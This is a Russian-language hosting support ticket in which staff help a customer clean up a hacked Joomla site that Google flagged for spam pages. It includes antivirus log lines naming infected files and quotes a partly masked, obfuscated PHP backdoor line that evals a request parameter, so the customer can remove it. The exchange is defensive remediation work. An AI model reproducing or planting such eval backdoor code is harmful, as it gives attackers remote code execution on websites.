| Вопрос: |
Доброе утро. Восстановите, пожалуйста, из бэкапа сайт ****.*.*. Взломали. Спасибо |
| Ответ: |
Здравствуйте сайт servicecenter***.in.ua работает. в чем заключется взлом? |
| Вопрос: |
Гугл прислал, что было внедрение через URL. И как рекомендацию предложил восстановить сайт из последней надежной резервной копии. |
| Ответ: |
нужны более конкретные данные. тут ничего нет https://sitecheck.sucuri.net/results/servicecenter***.in.ua сейчас мы проверим сайт антивирусом. потаму что * не факт что он взломан * в бекапе те же данные что и у Вас на сайте |
| Вопрос: |
В гугл вебмастере появились ошибки сканирования и там вот такие ссылки на страницы, которых у меня точно нет:http://****.*.***ipl******.htmlhttp://****.*.***.htmlИ написано ,что сайт взломан и на созданных страницах размещен контент, содержащий спам. |
| Ответ: |
отчет сканирования http://servicecenter***.in.ua/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html сейчас проверим бекап |
| Ответ: |
сообщите когда google прислал Вам отчет |
| Вопрос: |
Отчет прислали вчера вечером, а ошибки указаны за ** и ** мая |
| Ответ: |
наш бекап делался вчера ** мая |
| Ответ: |
подозрительные скрипты у вас с ** мая |
| Ответ: |
в логах антивируса еще более старые даты /home/esma/servicecenter***/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/includes/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/includes/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/libraries/cms/toolbar/button/help.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/style.php: {HEX}gzbase**.inject.unclassed.**.UNOFFICIAL FOUND |
| Вопрос: |
И более ранней версии нет? |
| Вопрос: |
Чем за **мая? |
| Ответ: |
нет. сайт был заражен как минимум ** мая мы сейчас удаллили часть вредоносных файлов. сейчас проведем повторное скнирование |
| Ответ: |
http://****.*.*-******-**-**-*******-**.html |
| Вопрос: |
Спасибо огромное. Как Вы думаете это поможет избавиться от этого `контента`? |
| Ответ: |
в файлах указаных в отчет удалите первую строку с вредносным кодом например <?php $swn**=`sotp_`;$djyq**= strtoupper ($swn**[*].$swn**[*] . $swn**[*].$swn**[*]. $swn**[*]); if(isset ( ${$djyq**}[ 'q***aac'] ) ){ eval (${$djyq** } ['q***aac'] ) ;} <?php только <?php вконце строки оставляйте, это важно |
| Вопрос: |
А если в файле только одна строка и
|
| Ответ: |
тогда это вирус |
| Вопрос: |
А если в файле только одна строка, значит удалять все,кроме
|
| Ответ: |
Попробуйте сперва переименовать файл. |
| Вопрос: |
Почему-то не работает ни сайт, ни админка |
| Ответ: |
что вы удалили? |
| Ответ: |
почему вы удалили файл конфигурации? |
| Вопрос: |
строку в /****/*joomla*.php ,которая указана в отчете, перед этим ее сохранила, и уже вставила обратно |
| Вопрос: |
заработало! |
| Ответ: |
вы удаляли файл конфтгурации. не нужно удлять не посмотрев что конкретно вы удаляете |
| Вопрос: |
понятно, буду смотреть, просто он был указан в отчете |
| Ответ: |
http://servicecenter***.in.ua/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html от отчет. файлы не удаляйте. удаляйте только код |
| Вопрос: |
я файл и не удаляла ,я удаляла строку в файле *.php, или код это что-то другое? я наверное что-то не поняла |
| Ответ: |
нет. вы удалили файл configuration.php/ у вас его небыло |
| Вопрос: |
я его не трогала. я заходила только в файл *.php и все. как исчез файл *.php - понятия не имею. |
| Ответ: |
будьте внимательны при работе. мы восстновили файлы. и просканировали. используйте последний отчет |
| Вопрос: |
Хорошо, спасибо, постараюсь разобраться |
| Ответ: |
ok
|
Служба поддержки
Личный кабинет
Регистрация